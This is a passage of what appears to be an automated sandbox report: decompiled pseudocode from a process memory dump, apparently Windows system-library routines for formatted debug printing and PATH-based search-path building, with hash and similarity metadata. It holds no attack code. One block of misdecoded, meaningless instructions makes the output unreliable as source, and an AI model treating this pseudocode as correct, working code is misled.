                                                                      				signed int _t65;
                                                                      				signed short _t69;
                                                                      				intOrPtr _t70;
                                                                      				signed short _t85;
                                                                      				void* _t86;
                                                                      				signed short _t89;
                                                                      				signed short _t91;
                                                                      				intOrPtr _t92;
                                                                      				intOrPtr _t97;
                                                                      				intOrPtr* _t98;
                                                                      				signed short _t99;
                                                                      				signed short _t101;
                                                                      				void* _t102;
                                                                      				char* _t103;
                                                                      				signed short _t104;
                                                                      				intOrPtr* _t110;
                                                                      				void* _t111;
                                                                      				void* _t114;
                                                                      				intOrPtr* _t115;
                                                                      
                                                                      				_t109 = __esi;
                                                                      				_t108 = __edi;
                                                                      				_t106 = __edx;
                                                                      				_t95 = __ebx;
                                                                      				_push(0x90);
                                                                      				_push(0xacf7a8);
                                                                      				E00A4D0E8(__ebx, __edi, __esi);
                                                                      				 *((intOrPtr*)(_t114 - 0x9c)) = __edx;
                                                                      				 *((intOrPtr*)(_t114 - 0x84)) = __ecx;
                                                                      				 *((intOrPtr*)(_t114 - 0x8c)) =  *((intOrPtr*)(_t114 + 0xc));
                                                                      				 *((intOrPtr*)(_t114 - 0x88)) =  *((intOrPtr*)(_t114 + 0x10));
                                                                      				 *((intOrPtr*)(_t114 - 0x78)) =  *[fs:0x18];
                                                                      				if(__edx == 0xffffffff) {
                                                                      					L6:
                                                                      					_t97 =  *((intOrPtr*)(_t114 - 0x78));
                                                                      					_t65 =  *(_t97 + 0xfca) & 0x0000ffff;
                                                                      					__eflags = _t65 & 0x00000002;
                                                                      					if((_t65 & 0x00000002) != 0) {
                                                                      						L3:
                                                                      						L4:
                                                                      						return E00A4D130(_t95, _t108, _t109);
                                                                      					}
                                                                      					 *(_t97 + 0xfca) = _t65 | 0x00000002;
                                                                      					_t108 = 0;
                                                                      					_t109 = 0;
                                                                      					_t95 = 0;
                                                                      					__eflags = 0;
                                                                      					while(1) {
                                                                      						__eflags = _t95 - 0x200;
                                                                      						if(_t95 >= 0x200) {
                                                                      							break;
                                                                      						}
                                                                      						E00A3D000(0x80);
                                                                      						 *((intOrPtr*)(_t114 - 0x18)) = _t115;
                                                                      						_t108 = _t115;
                                                                      						_t95 = _t95 - 0xffffff80;
                                                                      						_t17 = _t114 - 4;
                                                                      						 *_t17 =  *(_t114 - 4) & 0x00000000;
                                                                      						__eflags =  *_t17;
                                                                      						_t106 =  *((intOrPtr*)(_t114 - 0x84));
                                                                      						_t110 =  *((intOrPtr*)(_t114 - 0x84));
                                                                      						_t102 = _t110 + 1;
                                                                      						do {
                                                                      							_t85 =  *_t110;
                                                                      							_t110 = _t110 + 1;
                                                                      							__eflags = _t85;
                                                                      						} while (_t85 != 0);
                                                                      						_t111 = _t110 - _t102;
                                                                      						_t21 = _t95 - 1; // -129
                                                                      						_t86 = _t21;
                                                                      						__eflags = _t111 - _t86;
                                                                      						if(_t111 > _t86) {
                                                                      							_t111 = _t86;
                                                                      						}
                                                                      						E00A3F3E0(_t108, _t106, _t111);
                                                                      						_t115 = _t115 + 0xc;
                                                                      						_t103 = _t111 + _t108;
                                                                      						 *((intOrPtr*)(_t114 - 0x80)) = _t103;
                                                                      						_t89 = _t95 - _t111;
                                                                      						__eflags = _t89;
                                                                      						_push(0);
                                                                      						if(_t89 == 0) {
                                                                      							L15:
                                                                      							_t109 = 0xc000000d;
                                                                      							goto L16;
                                                                      						} else {
                                                                      							__eflags = _t89 - 0x7fffffff;
                                                                      							if(_t89 <= 0x7fffffff) {
                                                                      								L16:
                                                                      								 *(_t114 - 0x94) = _t109;
                                                                      								__eflags = _t109;
                                                                      								if(_t109 < 0) {
                                                                      									__eflags = _t89;
                                                                      									if(_t89 != 0) {
                                                                      										 *_t103 = 0;
                                                                      									}
                                                                      									L26:
                                                                      									 *(_t114 - 0xa0) = _t109;
                                                                      									 *(_t114 - 4) = 0xfffffffe;
                                                                      									__eflags = _t109;
                                                                      									if(_t109 >= 0) {
                                                                      										L31:
                                                                      										_t98 = _t108;
                                                                      										_t39 = _t98 + 1; // 0x1
                                                                      										_t106 = _t39;
                                                                      										do {
                                                                      											_t69 =  *_t98;
                                                                      											_t98 = _t98 + 1;
                                                                      											__eflags = _t69;
                                                                      										} while (_t69 != 0);
                                                                      										_t99 = _t98 - _t106;
                                                                      										__eflags = _t99;
                                                                      										L34:
                                                                      										_t70 =  *[fs:0x30];
                                                                      										__eflags =  *((char*)(_t70 + 2));
                                                                      										if( *((char*)(_t70 + 2)) != 0) {
                                                                      											L40:
                                                                      											 *((intOrPtr*)(_t114 - 0x74)) = 0x40010006;
                                                                      											 *(_t114 - 0x6c) =  *(_t114 - 0x6c) & 0x00000000;
                                                                      											 *((intOrPtr*)(_t114 - 0x64)) = 2;
                                                                      											 *(_t114 - 0x70) =  *(_t114 - 0x70) & 0x00000000;
                                                                      											 *((intOrPtr*)(_t114 - 0x60)) = (_t99 & 0x0000ffff) + 1;
                                                                      											 *((intOrPtr*)(_t114 - 0x5c)) = _t108;
                                                                      											 *(_t114 - 4) = 1;
                                                                      											_push(_t114 - 0x74);
                                                                      											L00A4DEF0(_t99, _t106);
                                                                      											 *(_t114 - 4) = 0xfffffffe;
                                                                      											 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
                                                                      											goto L3;
                                                                      										}
                                                                      										__eflags = ( *0x7ffe02d4 & 0x00000003) - 3;
                                                                      										if(( *0x7ffe02d4 & 0x00000003) != 3) {
                                                                      											goto L40;
                                                                      										}
                                                                      										_push( *((intOrPtr*)(_t114 + 8)));
                                                                      										_push( *((intOrPtr*)(_t114 - 0x9c)));
                                                                      										_push(_t99 & 0x0000ffff);
                                                                      										_push(_t108);
                                                                      										_push(1);
                                                                      										_t101 = E00A3B280();
                                                                      										__eflags =  *((char*)(_t114 + 0x14)) - 1;
                                                                      										if( *((char*)(_t114 + 0x14)) == 1) {
                                                                      											__eflags = _t101 - 0x80000003;
                                                                      											if(_t101 == 0x80000003) {
                                                                      												E00A3B7E0(1);
                                                                      												_t101 = 0;
                                                                      												__eflags = 0;
                                                                      											}
                                                                      										}
                                                                      										 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
                                                                      										goto L4;
                                                                      									}
                                                                      									__eflags = _t109 - 0x80000005;
                                                                      									if(_t109 == 0x80000005) {
                                                                      										continue;
                                                                      									}
                                                                      									break;
                                                                      								}
                                                                      								 *(_t114 - 0x90) = 0;
                                                                      								 *((intOrPtr*)(_t114 - 0x7c)) = _t89 - 1;
                                                                      								_t91 = E00A3E2D0(_t103, _t89 - 1,  *((intOrPtr*)(_t114 - 0x8c)),  *((intOrPtr*)(_t114 - 0x88)));
                                                                      								_t115 = _t115 + 0x10;
                                                                      								_t104 = _t91;
                                                                      								_t92 =  *((intOrPtr*)(_t114 - 0x7c));
                                                                      								__eflags = _t104;
                                                                      								if(_t104 < 0) {
                                                                      									L21:
                                                                      									_t109 = 0x80000005;
                                                                      									 *(_t114 - 0x90) = 0x80000005;
                                                                      									L22:
                                                                      									 *((char*)(_t92 +  *((intOrPtr*)(_t114 - 0x80)))) = 0;
                                                                      									L23:
                                                                      									 *(_t114 - 0x94) = _t109;
                                                                      									goto L26;
                                                                      								}
                                                                      								__eflags = _t104 - _t92;
                                                                      								if(__eflags > 0) {
                                                                      									goto L21;
                                                                      								}
                                                                      								if(__eflags == 0) {
                                                                      									goto L22;
                                                                      								}
                                                                      								goto L23;
                                                                      							}
                                                                      							goto L15;
                                                                      						}
                                                                      					}
                                                                      					__eflags = _t109;
                                                                      					if(_t109 >= 0) {
                                                                      						goto L31;
                                                                      					}
                                                                      					__eflags = _t109 - 0x80000005;
                                                                      					if(_t109 != 0x80000005) {
                                                                      						goto L31;
                                                                      					}
                                                                      					 *((short*)(_t95 + _t108 - 2)) = 0xa;
                                                                      					_t38 = _t95 - 1; // -129
                                                                      					_t99 = _t38;
                                                                      					goto L34;
                                                                      				}
                                                                      				if( *((char*)( *[fs:0x30] + 2)) != 0) {
                                                                      					__eflags = __edx - 0x65;
                                                                      					if(__edx != 0x65) {
                                                                      						goto L2;
                                                                      					}
                                                                      					goto L6;
                                                                      				}
                                                                      				L2:
                                                                      				_push( *((intOrPtr*)(_t114 + 8)));
                                                                      				_push(_t106);
                                                                      				if(E00A3A890() != 0) {
                                                                      					goto L6;
                                                                      				}
                                                                      				goto L3;
                                                                      			}

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.362484346.00000000009D0000.00000040.00000001.sdmp, Offset: 009D0000, based on PE: true
                                                                      Similarity
                                                                      • API ID: _vswprintf_s
                                                                      • String ID:
                                                                      • API String ID: 677850445-0
                                                                      • Opcode ID: 4b8f183628924b255781d08dfc0f40b4b80e7c9f62976cf41964fc0e88429e68
                                                                      • Instruction ID: 898e9e38df8fddb80b73bdfe0b47d4de4f63c6b651772c17f0cb724886d26f57
                                                                      • Opcode Fuzzy Hash: 4b8f183628924b255781d08dfc0f40b4b80e7c9f62976cf41964fc0e88429e68
                                                                      • Instruction Fuzzy Hash: 6451E271D04259CEDB30CF68C941BAEBBB0BF18719F2041ADEC59AB281D7304D899B90
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 83%
                                                                      			E00A22581(void* __ebx, intOrPtr __ecx, signed int __edx, void* __edi, void* __esi, signed int _a4, char _a8, signed int _a12, intOrPtr _a16, intOrPtr _a20, signed int _a24, char _a1530200222, char _a1546911902) {
                                                                      				signed int _v8;
                                                                      				signed int _v16;
                                                                      				unsigned int _v24;
                                                                      				void* _v28;
                                                                      				signed int _v32;
                                                                      				unsigned int _v36;
                                                                      				signed int _v37;
                                                                      				signed int _v40;
                                                                      				signed int _v44;
                                                                      				signed int _v48;
                                                                      				signed int _v52;
                                                                      				signed int _v56;
                                                                      				intOrPtr _v60;
                                                                      				signed int _v64;
                                                                      				signed int _v68;
                                                                      				signed int _v72;
                                                                      				signed int _v76;
                                                                      				signed int _v80;
                                                                      				signed int _t239;
                                                                      				signed int _t243;
                                                                      				char _t244;
                                                                      				signed int _t249;
                                                                      				signed int _t251;
                                                                      				intOrPtr _t253;
                                                                      				signed int _t256;
                                                                      				signed int _t263;
                                                                      				signed int _t266;
                                                                      				signed int _t274;
                                                                      				signed int _t280;
                                                                      				signed int _t282;
                                                                      				void* _t284;
                                                                      				void* _t285;
                                                                      				signed int _t286;
                                                                      				unsigned int _t289;
                                                                      				signed int _t293;
                                                                      				void* _t294;
                                                                      				signed int _t295;
                                                                      				signed int _t299;
                                                                      				intOrPtr _t312;
                                                                      				signed int _t321;
                                                                      				signed int _t323;
                                                                      				signed int _t324;
                                                                      				signed int _t328;
                                                                      				signed int _t329;
                                                                      				signed int _t331;
                                                                      				signed int _t333;
                                                                      				signed int _t335;
                                                                      				void* _t336;
                                                                      
                                                                      				_t333 = _t335;
                                                                      				_t336 = _t335 - 0x4c;
                                                                      				_v8 =  *0xaed360 ^ _t333;
                                                                      				_push(__ebx);
                                                                      				_push(__esi);
                                                                      				_push(__edi);
                                                                      				_t328 = 0xaeb2e8;
                                                                      				_v56 = _a4;
                                                                      				_v48 = __edx;
                                                                      				_v60 = __ecx;
                                                                      				_t289 = 0;
                                                                      				_v80 = 0;
                                                                      				asm("movsd");
                                                                      				_v64 = 0;
                                                                      				_v76 = 0;
                                                                      				_v72 = 0;
                                                                      				asm("movsd");
                                                                      				_v44 = 0;
                                                                      				_v52 = 0;
                                                                      				_v68 = 0;
                                                                      				asm("movsd");
                                                                      				_v32 = 0;
                                                                      				_v36 = 0;
                                                                      				asm("movsd");
                                                                      				_v16 = 0;
                                                                      				_t280 = 0x48;
                                                                      				_t309 = 0 | (_v24 >> 0x0000001c & 0x00000003) == 0x00000001;
                                                                      				_t321 = 0;
                                                                      				_v37 = _t309;
                                                                      				if(_v48 <= 0) {
                                                                      					L16:
                                                                      					_t45 = _t280 - 0x48; // 0x0
                                                                      					__eflags = _t45 - 0xfffe;
                                                                      					if(_t45 > 0xfffe) {
                                                                      						_t329 = 0xc0000106;
                                                                      						goto L32;
                                                                      					} else {
                                                                      						_t328 = L00A14620(_t289,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t280);
                                                                      						_v52 = _t328;
                                                                      						__eflags = _t328;
                                                                      						if(_t328 == 0) {
                                                                      							_t329 = 0xc0000017;
                                                                      							goto L32;
                                                                      						} else {
                                                                      							 *(_t328 + 0x44) =  *(_t328 + 0x44) & 0x00000000;
                                                                      							_t50 = _t328 + 0x48; // 0x48
                                                                      							_t323 = _t50;
                                                                      							_t309 = _v32;
                                                                      							 *(_t328 + 0x3c) = _t280;
                                                                      							_t282 = 0;
                                                                      							 *((short*)(_t328 + 0x30)) = _v48;
                                                                      							__eflags = _t309;
                                                                      							if(_t309 != 0) {
                                                                      								 *(_t328 + 0x18) = _t323;
                                                                      								__eflags = _t309 - 0xae8478;
                                                                      								 *_t328 = ((0 | _t309 == 0x00ae8478) - 0x00000001 & 0xfffffffb) + 7;
                                                                      								E00A3F3E0(_t323,  *((intOrPtr*)(_t309 + 4)),  *_t309 & 0x0000ffff);
                                                                      								_t309 = _v32;
                                                                      								_t336 = _t336 + 0xc;
                                                                      								_t282 = 1;
                                                                      								__eflags = _a8;
                                                                      								_t323 = _t323 + (( *_t309 & 0x0000ffff) >> 1) * 2;
                                                                      								if(_a8 != 0) {
                                                                      									_t274 = E00A839F2(_t323);
                                                                      									_t309 = _v32;
                                                                      									_t323 = _t274;
                                                                      								}
                                                                      							}
                                                                      							_t293 = 0;
                                                                      							_v16 = 0;
                                                                      							__eflags = _v48;
                                                                      							if(_v48 <= 0) {
                                                                      								L31:
                                                                      								_t329 = _v68;
                                                                      								__eflags = 0;
                                                                      								 *((short*)(_t323 - 2)) = 0;
                                                                      								goto L32;
                                                                      							} else {
                                                                      								_t280 = _t328 + _t282 * 4;
                                                                      								_v56 = _t280;
                                                                      								do {
                                                                      									__eflags = _t309;
                                                                      									if(_t309 != 0) {
                                                                      										_t239 =  *(_v60 + _t293 * 4);
                                                                      										__eflags = _t239;
                                                                      										if(_t239 == 0) {
                                                                      											goto L30;
                                                                      										} else {
                                                                      											__eflags = _t239 == 5;
                                                                      											if(_t239 == 5) {
                                                                      												goto L30;
                                                                      											} else {
                                                                      												goto L22;
                                                                      											}
                                                                      										}
                                                                      									} else {
                                                                      										L22:
                                                                      										 *_t280 =  *(_v60 + _t293 * 4);
                                                                      										 *(_t280 + 0x18) = _t323;
                                                                      										_t243 =  *(_v60 + _t293 * 4);
                                                                      										__eflags = _t243 - 8;
                                                                      										if(_t243 > 8) {
                                                                      											goto L56;
                                                                      										} else {
                                                                      											switch( *((intOrPtr*)(_t243 * 4 +  &M00A22959))) {
                                                                      												case 0:
                                                                      													__ax =  *0xae8488;
                                                                      													__eflags = __ax;
                                                                      													if(__ax == 0) {
                                                                      														goto L29;
                                                                      													} else {
                                                                      														__ax & 0x0000ffff = E00A3F3E0(__edi,  *0xae848c, __ax & 0x0000ffff);
                                                                      														__eax =  *0xae8488 & 0x0000ffff;
                                                                      														goto L26;
                                                                      													}
                                                                      													goto L108;
                                                                      												case 1:
                                                                      													L45:
                                                                      													E00A3F3E0(_t323, _v80, _v64);
                                                                      													_t269 = _v64;
                                                                      													goto L26;
                                                                      												case 2:
                                                                      													 *0xae8480 & 0x0000ffff = E00A3F3E0(__edi,  *0xae8484,  *0xae8480 & 0x0000ffff);
                                                                      													__eax =  *0xae8480 & 0x0000ffff;
                                                                      													__eax = ( *0xae8480 & 0x0000ffff) >> 1;
                                                                      													__edi = __edi + __eax * 2;
                                                                      													goto L28;
                                                                      												case 3:
                                                                      													__eax = _v44;
                                                                      													__eflags = __eax;
                                                                      													if(__eax == 0) {
                                                                      														goto L29;
                                                                      													} else {
                                                                      														__esi = __eax + __eax;
                                                                      														__eax = E00A3F3E0(__edi, _v72, __esi);
                                                                      														__edi = __edi + __esi;
                                                                      														__esi = _v52;
                                                                      														goto L27;
                                                                      													}
                                                                      													goto L108;
                                                                      												case 4:
                                                                      													_push(0x2e);
                                                                      													_pop(__eax);
                                                                      													 *(__esi + 0x44) = __edi;
                                                                      													 *__edi = __ax;
                                                                      													__edi = __edi + 4;
                                                                      													_push(0x3b);
                                                                      													_pop(__eax);
                                                                      													 *(__edi - 2) = __ax;
                                                                      													goto L29;
                                                                      												case 5:
                                                                      													__eflags = _v36;
                                                                      													if(_v36 == 0) {
                                                                      														goto L45;
                                                                      													} else {
                                                                      														E00A3F3E0(_t323, _v76, _v36);
                                                                      														_t269 = _v36;
                                                                      													}
                                                                      													L26:
                                                                      													_t336 = _t336 + 0xc;
                                                                      													_t323 = _t323 + (_t269 >> 1) * 2 + 2;
                                                                      													__eflags = _t323;
                                                                      													L27:
                                                                      													_push(0x3b);
                                                                      													_pop(_t271);
                                                                      													 *((short*)(_t323 - 2)) = _t271;
                                                                      													goto L28;
                                                                      												case 6:
                                                                      													__ebx =  *0xae575c;
                                                                      													__eflags = __ebx - 0xae575c;
                                                                      													if(__ebx != 0xae575c) {
                                                                      														_push(0x3b);
                                                                      														_pop(__esi);
                                                                      														do {
                                                                      															 *(__ebx + 8) & 0x0000ffff = __ebx + 0xa;
                                                                      															E00A3F3E0(__edi, __ebx + 0xa,  *(__ebx + 8) & 0x0000ffff) =  *(__ebx + 8) & 0x0000ffff;
                                                                      															__eax = ( *(__ebx + 8) & 0x0000ffff) >> 1;
                                                                      															__edi = __edi + __eax * 2;
                                                                      															__edi = __edi + 2;
                                                                      															 *(__edi - 2) = __si;
                                                                      															__ebx =  *__ebx;
                                                                      															__eflags = __ebx - 0xae575c;
                                                                      														} while (__ebx != 0xae575c);
                                                                      														__esi = _v52;
                                                                      														__ecx = _v16;
                                                                      														__edx = _v32;
                                                                      													}
                                                                      													__ebx = _v56;
                                                                      													goto L29;
                                                                      												case 7:
                                                                      													 *0xae8478 & 0x0000ffff = E00A3F3E0(__edi,  *0xae847c,  *0xae8478 & 0x0000ffff);
                                                                      													__eax =  *0xae8478 & 0x0000ffff;
                                                                      													__eax = ( *0xae8478 & 0x0000ffff) >> 1;
                                                                      													__eflags = _a8;
                                                                      													__edi = __edi + __eax * 2;
                                                                      													if(_a8 != 0) {
                                                                      														__ecx = __edi;
                                                                      														__eax = E00A839F2(__ecx);
                                                                      														__edi = __eax;
                                                                      													}
                                                                      													goto L28;
                                                                      												case 8:
                                                                      													__eax = 0;
                                                                      													 *(__edi - 2) = __ax;
                                                                      													 *0xae6e58 & 0x0000ffff = E00A3F3E0(__edi,  *0xae6e5c,  *0xae6e58 & 0x0000ffff);
                                                                      													 *(__esi + 0x38) = __edi;
                                                                      													__eax =  *0xae6e58 & 0x0000ffff;
                                                                      													__eax = ( *0xae6e58 & 0x0000ffff) >> 1;
                                                                      													__edi = __edi + __eax * 2;
                                                                      													__edi = __edi + 2;
                                                                      													L28:
                                                                      													_t293 = _v16;
                                                                      													_t309 = _v32;
                                                                      													L29:
                                                                      													_t280 = _t280 + 4;
                                                                      													__eflags = _t280;
                                                                      													_v56 = _t280;
                                                                      													goto L30;
                                                                      											}
                                                                      										}
                                                                      									}
                                                                      									goto L108;
                                                                      									L30:
                                                                      									_t293 = _t293 + 1;
                                                                      									_v16 = _t293;
                                                                      									__eflags = _t293 - _v48;
                                                                      								} while (_t293 < _v48);
                                                                      								goto L31;
                                                                      							}
                                                                      						}
                                                                      					}
                                                                      				} else {
                                                                      					while(1) {
                                                                      						L1:
                                                                      						_t243 =  *(_v60 + _t321 * 4);
                                                                      						if(_t243 > 8) {
                                                                      							break;
                                                                      						}
                                                                      						switch( *((intOrPtr*)(_t243 * 4 +  &M00A22935))) {
                                                                      							case 0:
                                                                      								__ax =  *0xae8488;
                                                                      								__eflags = __ax;
                                                                      								if(__ax != 0) {
                                                                      									__eax = __ax & 0x0000ffff;
                                                                      									__ebx = __ebx + 2;
                                                                      									__eflags = __ebx;
                                                                      									goto L53;
                                                                      								}
                                                                      								goto L14;
                                                                      							case 1:
                                                                      								L44:
                                                                      								_t309 =  &_v64;
                                                                      								_v80 = E00A22E3E(0,  &_v64);
                                                                      								_t280 = _t280 + _v64 + 2;
                                                                      								goto L13;
                                                                      							case 2:
                                                                      								__eax =  *0xae8480 & 0x0000ffff;
                                                                      								__ebx = __ebx + __eax;
                                                                      								__eflags = __dl;
                                                                      								if(__dl != 0) {
                                                                      									__eax = 0xae8480;
                                                                      									goto L80;
                                                                      								}
                                                                      								goto L14;
                                                                      							case 3:
                                                                      								__eax = E00A0EEF0(0xae79a0);
                                                                      								__eax =  &_v44;
                                                                      								_push(__eax);
                                                                      								_push(0);
                                                                      								_push(0);
                                                                      								_push(4);
                                                                      								_push(L"PATH");
                                                                      								_push(0);
                                                                      								L57();
                                                                      								__esi = __eax;
                                                                      								_v68 = __esi;
                                                                      								__eflags = __esi - 0xc0000023;
                                                                      								if(__esi != 0xc0000023) {
                                                                      									L10:
                                                                      									__eax = E00A0EB70(__ecx, 0xae79a0);
                                                                      									__eflags = __esi - 0xc0000100;
                                                                      									if(__esi == 0xc0000100) {
                                                                      										_v44 = _v44 & 0x00000000;
                                                                      										__eax = 0;
                                                                      										_v68 = 0;
                                                                      										goto L13;
                                                                      									} else {
                                                                      										__eflags = __esi;
                                                                      										if(__esi < 0) {
                                                                      											L32:
                                                                      											_t217 = _v72;
                                                                      											__eflags = _t217;
                                                                      											if(_t217 != 0) {
                                                                      												L00A177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t217);
                                                                      											}
                                                                      											_t218 = _v52;
                                                                      											__eflags = _t218;
                                                                      											if(_t218 != 0) {
                                                                      												__eflags = _t329;
                                                                      												if(_t329 < 0) {
                                                                      													L00A177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t218);
                                                                      													_t218 = 0;
                                                                      												}
                                                                      											}
                                                                      											goto L36;
                                                                      										} else {
                                                                      											__eax = _v44;
                                                                      											__ebx = __ebx + __eax * 2;
                                                                      											__ebx = __ebx + 2;
                                                                      											__eflags = __ebx;
                                                                      											L13:
                                                                      											_t289 = _v36;
                                                                      											goto L14;
                                                                      										}
                                                                      									}
                                                                      								} else {
                                                                      									__eax = _v44;
                                                                      									__ecx =  *0xae7b9c; // 0x0
                                                                      									_v44 + _v44 =  *[fs:0x30];
                                                                      									__ecx = __ecx + 0x180000;
                                                                      									__eax = L00A14620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), __ecx,  *[fs:0x30]);
                                                                      									_v72 = __eax;
                                                                      									__eflags = __eax;
                                                                      									if(__eax == 0) {
                                                                      										__eax = E00A0EB70(__ecx, 0xae79a0);
                                                                      										__eax = _v52;
                                                                      										L36:
                                                                      										_pop(_t322);
                                                                      										_pop(_t330);
                                                                      										__eflags = _v8 ^ _t333;
                                                                      										_pop(_t281);
                                                                      										return E00A3B640(_t218, _t281, _v8 ^ _t333, _t309, _t322, _t330);
                                                                      									} else {
                                                                      										__ecx =  &_v44;
                                                                      										_push(__ecx);
                                                                      										_push(_v44);
                                                                      										_push(__eax);
                                                                      										_push(4);
                                                                      										_push(L"PATH");
                                                                      										_push(0);
                                                                      										L57();
                                                                      										__esi = __eax;
                                                                      										_v68 = __eax;
                                                                      										goto L10;
                                                                      									}
                                                                      								}
                                                                      								goto L108;
                                                                      							case 4:
                                                                      								__ebx = __ebx + 4;
                                                                      								goto L14;
                                                                      							case 5:
                                                                      								_t276 = _v56;
                                                                      								if(_v56 != 0) {
                                                                      									_t309 =  &_v36;
                                                                      									_t278 = E00A22E3E(_t276,  &_v36);
                                                                      									_t289 = _v36;
                                                                      									_v76 = _t278;
                                                                      								}
                                                                      								if(_t289 == 0) {
                                                                      									goto L44;
                                                                      								} else {
                                                                      									_t280 = _t280 + 2 + _t289;
                                                                      								}
                                                                      								goto L14;
                                                                      							case 6:
                                                                      								__eax =  *0xae5764 & 0x0000ffff;
                                                                      								goto L53;
                                                                      							case 7:
                                                                      								__eax =  *0xae8478 & 0x0000ffff;
                                                                      								__ebx = __ebx + __eax;
                                                                      								__eflags = _a8;
                                                                      								if(_a8 != 0) {
                                                                      									__ebx = __ebx + 0x16;
                                                                      									__ebx = __ebx + __eax;
                                                                      								}
                                                                      								__eflags = __dl;
                                                                      								if(__dl != 0) {
                                                                      									__eax = 0xae8478;
                                                                      									L80:
                                                                      									_v32 = __eax;
                                                                      								}
                                                                      								goto L14;
                                                                      							case 8:
                                                                      								__eax =  *0xae6e58 & 0x0000ffff;
                                                                      								__eax = ( *0xae6e58 & 0x0000ffff) + 2;
                                                                      								L53:
                                                                      								__ebx = __ebx + __eax;
                                                                      								L14:
                                                                      								_t321 = _t321 + 1;
                                                                      								if(_t321 >= _v48) {
                                                                      									goto L16;
                                                                      								} else {
                                                                      									_t309 = _v37;
                                                                      									goto L1;
                                                                      								}
                                                                      								goto L108;
                                                                      						}
                                                                      					}
                                                                      					L56:
                                                                      					_t294 = 0x25;
                                                                      					asm("int 0x29");
                                                                      					asm("out 0x28, al");
                                                                      					 *0xa2286600 = _t243;
                                                                      					_t244 = _t243 + _t243;
                                                                      					asm("daa");
                                                                      					 *0xa2262e00 = _t244;
                                                                      					 *((intOrPtr*)(_t328 + 0x28)) =  *((intOrPtr*)(_t328 + 0x28)) + _t244;
                                                                      					 *0xa2260500 = _t244;
                                                                      					 *_t323 =  *_t323 + _t280;
                                                                      					_pop(_t284);
                                                                      					asm("cmpsb");
                                                                      					 *((intOrPtr*)(_t244 +  &_a1530200222)) =  *((intOrPtr*)(_t244 +  &_a1530200222)) + _t309;
                                                                      					asm("cmpsb");
                                                                      					 *_t309 =  *_t309 + _t244;
                                                                      					 *((intOrPtr*)(_t309 - 0x5dd78000)) =  *((intOrPtr*)(_t309 - 0x5dd78000)) - _t336;
                                                                      					asm("daa");
                                                                      					 *0xa2281e00 = _t244;
                                                                      					 *((intOrPtr*)(_t328 + 0x28)) =  *((intOrPtr*)(_t328 + 0x28)) + _t294;
                                                                      					 *0xa2275d00 = _t244;
                                                                      					_pop(_t285);
                                                                      					asm("cmpsb");
                                                                      					 *((intOrPtr*)(_t244 + _t284 +  &_a1546911902)) =  *((intOrPtr*)(_t244 + _t284 +  &_a1546911902)) + _t309 + _t309;
                                                                      					asm("cmpsb");
                                                                      					asm("int3");
                                                                      					asm("int3");
                                                                      					asm("int3");
                                                                      					asm("int3");
                                                                      					asm("int3");
                                                                      					asm("int3");
                                                                      					asm("int3");
                                                                      					asm("int3");
                                                                      					asm("int3");
                                                                      					asm("int3");
                                                                      					asm("int3");
                                                                      					asm("int3");
                                                                      					asm("int3");
                                                                      					asm("int3");
                                                                      					asm("int3");
                                                                      					asm("int3");
                                                                      					asm("int3");
                                                                      					asm("int3");
                                                                      					_push(0x20);
                                                                      					_push(0xacff00);
                                                                      					E00A4D08C(_t285, _t323, _t328);
                                                                      					_v44 =  *[fs:0x18];
                                                                      					_t324 = 0;
                                                                      					 *_a24 = 0;
                                                                      					_t286 = _a12;
                                                                      					__eflags = _t286;
                                                                      					if(_t286 == 0) {
                                                                      						_t249 = 0xc0000100;
                                                                      					} else {
                                                                      						_v8 = 0;
                                                                      						_t331 = 0xc0000100;
                                                                      						_v52 = 0xc0000100;
                                                                      						_t251 = 4;
                                                                      						while(1) {
                                                                      							_v40 = _t251;
                                                                      							__eflags = _t251;
                                                                      							if(_t251 == 0) {
                                                                      								break;
                                                                      							}
                                                                      							_t299 = _t251 * 0xc;
                                                                      							_v48 = _t299;
                                                                      							__eflags = _t286 -  *((intOrPtr*)(_t299 + 0x9d1664));
                                                                      							if(__eflags <= 0) {
                                                                      								if(__eflags == 0) {
                                                                      									_t266 = E00A3E5C0(_a8,  *((intOrPtr*)(_t299 + 0x9d1668)), _t286);
                                                                      									_t336 = _t336 + 0xc;
                                                                      									__eflags = _t266;
                                                                      									if(__eflags == 0) {
                                                                      										_t331 = E00A751BE(_t286,  *((intOrPtr*)(_v48 + 0x9d166c)), _a16, _t324, _t331, __eflags, _a20, _a24);
                                                                      										_v52 = _t331;
                                                                      										break;
                                                                      									} else {
                                                                      										_t251 = _v40;
                                                                      										goto L62;
                                                                      									}
                                                                      									goto L70;
                                                                      								} else {
                                                                      									L62:
                                                                      									_t251 = _t251 - 1;
                                                                      									continue;
                                                                      								}
                                                                      							}
                                                                      							break;
                                                                      						}
                                                                      						_v32 = _t331;
                                                                      						__eflags = _t331;
                                                                      						if(_t331 < 0) {
                                                                      							__eflags = _t331 - 0xc0000100;
                                                                      							if(_t331 == 0xc0000100) {
                                                                      								_t295 = _a4;
                                                                      								__eflags = _t295;
                                                                      								if(_t295 != 0) {
                                                                      									_v36 = _t295;
                                                                      									__eflags =  *_t295 - _t324;
                                                                      									if( *_t295 == _t324) {
                                                                      										_t331 = 0xc0000100;
                                                                      										goto L76;
                                                                      									} else {
                                                                      										_t312 =  *((intOrPtr*)(_v44 + 0x30));
                                                                      										_t253 =  *((intOrPtr*)(_t312 + 0x10));
                                                                      										__eflags =  *((intOrPtr*)(_t253 + 0x48)) - _t295;
                                                                      										if( *((intOrPtr*)(_t253 + 0x48)) == _t295) {
                                                                      											__eflags =  *(_t312 + 0x1c);
                                                                      											if( *(_t312 + 0x1c) == 0) {
                                                                      												L106:
                                                                      												_t331 = E00A22AE4( &_v36, _a8, _t286, _a16, _a20, _a24);
                                                                      												_v32 = _t331;
                                                                      												__eflags = _t331 - 0xc0000100;
                                                                      												if(_t331 != 0xc0000100) {
                                                                      													goto L69;
                                                                      												} else {
                                                                      													_t324 = 1;
                                                                      													_t295 = _v36;
                                                                      													goto L75;
                                                                      												}
                                                                      											} else {
